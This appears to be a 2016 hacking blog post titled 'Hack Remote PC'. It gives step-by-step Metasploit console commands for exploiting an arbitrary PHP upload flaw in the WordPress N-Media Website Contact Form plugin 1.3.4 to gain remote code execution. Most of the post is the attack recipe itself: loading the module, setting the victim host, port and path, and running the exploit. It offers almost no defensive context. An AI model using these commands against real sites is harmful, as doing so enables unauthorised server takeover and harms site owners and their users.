Hacking Articles|Raj Chandel's Blog: Hack Remote PC using WordPress N-Media Website Contact Form with File Upload Vulnerability

Hack Remote PC using WordPress N-Media Website Contact Form with File Upload Vulnerability

at 10:59 AM Monday, April 25, 2016

This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.

Exploit Targets

WordPress N-Media Website Contact Form plugin

Requirement

Attacker: kali Linux

Victim PC: Wordpress Installed

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_nmediawebsite_file_upload

msf exploit (wp_nmediawebsite_file_upload)>set targeturi http://192.168.0.110/wordpress

msf exploit (wp_nmediawebsite_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_nmediawebsite_file_upload)>set rport 80

msf exploit (wp_nmediawebsite_file_upload)>exploit

Pages

Hacking Articles|Raj Chandel's Blog

Hack Remote PC using WordPress N-Media Website Contact Form with File Upload Vulnerability

0 comments:

Post a Comment

Labels

Popular Posts